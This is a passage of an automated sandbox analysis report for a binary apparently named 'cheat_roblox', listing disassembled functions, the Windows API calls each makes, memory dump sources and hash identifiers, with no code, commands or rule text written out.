                                                                              • Instruction ID: 4a8161f3e1f1ab30c54394ac2ac5e87fb7db74b186944879cb428696db237cbb
                                                                              • Opcode Fuzzy Hash: a095aec0443fd8cf801f98afcb412b518cb1d8a0794272d33745bf5c125c604f
                                                                              • Instruction Fuzzy Hash: F751C162A1868280EE249B2594463F92799FB85BC8F4401B3EF4DE7396CF3DE485C300
                                                                              Function 00007FF693E5E7A8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E63EC8: FindClose.KERNELBASE(?,?,00000000,00007FF693E70811), ref: 00007FF693E63EFD
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E5E993
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 1011579015-0
                                                                              • Opcode ID: 1fe2d1bf2adfaa81e5c33c8572439b09bd5b189cc72c519e038d04c62312892d
                                                                              • Instruction ID: b6a85e4cf37f4820224400b7fd4ac31404c1d666e2b99c97af48874225824b6e
                                                                              • Opcode Fuzzy Hash: 1fe2d1bf2adfaa81e5c33c8572439b09bd5b189cc72c519e038d04c62312892d
                                                                              • Instruction Fuzzy Hash: 67516C22A0878681FE708F25D4463BD63A9FB84B94F4401B7EA8DE77A5CF2CE841D350
                                                                              Function 00007FF693E61794 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3668304517-0
                                                                              • Opcode ID: 1a3e9e76ad114288e15434ebb275af96e281d1bd1cdf3bdc9b4bbd0de6425466
                                                                              • Instruction ID: 42e8dd0b0f5f6ec18ccdb60cfa7fc94a043403da612b9ed2bc457bb56303ea12
                                                                              • Opcode Fuzzy Hash: 1a3e9e76ad114288e15434ebb275af96e281d1bd1cdf3bdc9b4bbd0de6425466
                                                                              • Instruction Fuzzy Hash: 54410862F18A8542EA258A17AA063BDB259FB84FC4F448437EF4C97F4ADF3CD4518300
                                                                              Function 00007FF693E62F58 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3668304517-0
                                                                              • Opcode ID: a850992bbf36bc241638ec10066e9dd40a491b5d7b80e964c0b7e6f41e3c8c84
                                                                              • Instruction ID: 75ca788ca6b98a9fcffefd8747f6a91c64ab8227e9ecd86ed4844d7ea9458a57
                                                                              • Opcode Fuzzy Hash: a850992bbf36bc241638ec10066e9dd40a491b5d7b80e964c0b7e6f41e3c8c84
                                                                              • Instruction Fuzzy Hash: 07411762A08B0A81EE719B25E5463793365EB45BDCF140176EB8DA77E9CF3DE4448300
                                                                              Function 00007FF693E8BDF8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                              • String ID:
                                                                              • API String ID: 3947729631-0
                                                                              • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                              • Instruction ID: 7e9e6f20bd9f1bfc7ea4471b5e18bce70fc3ae0170ad21a15d1584a964c177f8
                                                                              • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                              • Instruction Fuzzy Hash: 4D41BD26E1864B86FB389B15985217823ADEF55B80F4444B7DA0DFB6A2DF3CEC41C740
                                                                              Function 00007FF693E5129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                              • String ID:
                                                                              • API String ID: 680105476-0
                                                                              • Opcode ID: 81bbc9496a7d415ea2bbbc601fb53a43020ae880daa92f7a292fdc8bc8c92929
                                                                              • Instruction ID: c850884a6ad4a2b50b0d4cb666c75ef31e02cbaff44c9dba8fd8bb425c043821
                                                                              • Opcode Fuzzy Hash: 81bbc9496a7d415ea2bbbc601fb53a43020ae880daa92f7a292fdc8bc8c92929
                                                                              • Instruction Fuzzy Hash: 5821B022A0835185EE249F92A4122796258FB14BF0F690B72DE7DEBBD1DE7CE0918300
                                                                              Function 00007FF693E9124C Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo
                                                                              • String ID:
                                                                              • API String ID: 3215553584-0
                                                                              • Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                              • Instruction ID: 76c5a044cee915380f203ea95a290a19722e54552cc728163e9c949c6799efec
                                                                              • Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                              • Instruction Fuzzy Hash: 9F113D32E1C78286F730AF51A44267972ADFB41380F5505B6EA8DEB796DF3CE8009744
                                                                              Function 00007FF693E7FC68 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E7F0A4: GetDlgItem.USER32 ref: 00007FF693E7F0E3
                                                                                • Part of subcall function 00007FF693E7F0A4: ShowWindow.USER32 ref: 00007FF693E7F109
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F11E
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F136
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F157
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F173
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F1B6
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F1D4
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F1E8
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F212
                                                                                • Part of subcall function 00007FF693E7F0A4: IsDlgButtonChecked.USER32 ref: 00007FF693E7F22A
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E7FD03
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ButtonChecked$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 4003826521-0
                                                                              • Opcode ID: 55df5415e05e11d7efafc2770020c6ad8282d6fa6a9594bfd21e10b7c707b1e0
                                                                              • Instruction ID: c7b903aa741b9ea017e30ef9c00209bc10234e11e241ad8f51f3704129574856
                                                                              • Opcode Fuzzy Hash: 55df5415e05e11d7efafc2770020c6ad8282d6fa6a9594bfd21e10b7c707b1e0
                                                                              • Instruction Fuzzy Hash: 7A01C462E2868A42ED309724D44737E6355EF89794F500772EA9D9ABD6DE2CE0818604
                                                                              Function 00007FF693E53AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3668304517-0
                                                                              • Opcode ID: f5fcd5f1c3f2e37d131694daf467b35a295dcb205b70c803901a30fdf0723196
                                                                              • Instruction ID: 8b86d29ff8cf48a6ccd8cf498d66374c0533937ff3353acd0877053050617905
                                                                              • Opcode Fuzzy Hash: f5fcd5f1c3f2e37d131694daf467b35a295dcb205b70c803901a30fdf0723196
                                                                              • Instruction Fuzzy Hash: E701D6A2E18BC541EE329728E44322D7365FFC9790F405372EA9C97BA5EF2CE5408704
                                                                              Function 00007FF693E81558 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E81604: GetModuleHandleW.KERNEL32(?,?,?,00007FF693E81573,?,?,?,00007FF693E8192A), ref: 00007FF693E8162B
                                                                              • DloadProtectSection.DELAYIMP ref: 00007FF693E815C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: DloadHandleModuleProtectSection
                                                                              • String ID:
                                                                              • API String ID: 2883838935-0
                                                                              • Opcode ID: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                              • Instruction ID: e675b969bdb16d6e5c3df2755e610e97d28b0b0705f7803b934d667d1bd87456
                                                                              • Opcode Fuzzy Hash: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                              • Instruction Fuzzy Hash: 8E119060D0A68B81FF759B16A9433B02369EF14348F1814B7D90DEA3B5EE3CA9958710
                                                                              Function 00007FF693E8FA04 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                              • Instruction ID: f3b93a3c39f3382b2ec87b54cba2d103017d65dee45cfe0b9951919e69b21bab
                                                                              • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                              • Instruction Fuzzy Hash: 3CF06D54F0930749FE745B66A9133F5129CDF54FA0F0854F2C90EEA3D1ED2CE6824210
                                                                              Function 00007FF693E63EC8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E640BC: FindFirstFileW.KERNELBASE ref: 00007FF693E6410B
                                                                                • Part of subcall function 00007FF693E640BC: FindFirstFileW.KERNEL32 ref: 00007FF693E6415E
                                                                                • Part of subcall function 00007FF693E640BC: GetLastError.KERNEL32 ref: 00007FF693E641AF
                                                                              • FindClose.KERNELBASE(?,?,00000000,00007FF693E70811), ref: 00007FF693E63EFD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1464966427-0
                                                                              • Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                              • Instruction ID: 23786481d72e3b650442b48055a953dee538fd86ff834426f4f550a42d8b8a76
                                                                              • Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                              • Instruction Fuzzy Hash: 50F0286250C34181EA719FB0A1022B93364DF15BB8F1813B6EB3D573D7CE28D444C744
                                                                              Function 00007FF693E8D94C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                              • Instruction ID: b8cd494078451710cd05926e125fbc2df4797c898b64a9027ead6f3364704da9
                                                                              • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                              • Instruction Fuzzy Hash: AFF08C10F0920B56FF746BB258133B61298DF887A0F0816B2DD6EE63C1DEACA4828210
                                                                              Function 00007FF693E620D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF693E6207E), ref: 00007FF693E620F6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ChangeCloseFindNotification
                                                                              • String ID:
                                                                              • API String ID: 2591292051-0
                                                                              • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                              • Instruction ID: a127095aac8a9f75ad5896273f330be4e9dcb44f7cbbbbbf80ffd79290442416
                                                                              • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                              • Instruction Fuzzy Hash: F0F0A922A0968685FF348F20E04237936A9EB14BBCF4943B6EB3C891D4DF28D8958300
                                                                              Function 00007FF693E6273C Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: File
                                                                              • String ID:
                                                                              • API String ID: 749574446-0
                                                                              • Opcode ID: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
                                                                              • Instruction ID: 2f703308f1f90a804214fd02c59315fee84819425106fa981ccd9e4fcd4d7c36
                                                                              • Opcode Fuzzy Hash: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
                                                                              • Instruction Fuzzy Hash: 37E08611A1051581EF309B26C8436342325EF48B84B441072CE0C97371CE29D8958700
                                                                              Function 00007FF693E62490 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: FileType
                                                                              • String ID:
                                                                              • API String ID: 3081899298-0
                                                                              • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                              • Instruction ID: 4b6909371fa4c8a7293372579a836bc52858ca9de3c6bc303bbf4abf94200a7a
                                                                              • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                              • Instruction Fuzzy Hash: 32D01212D0945183ED2097369C5303C3354EF92739FA407B2D73EE16E1CF1D9496A311
                                                                              Function 00007FF693E67FC4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
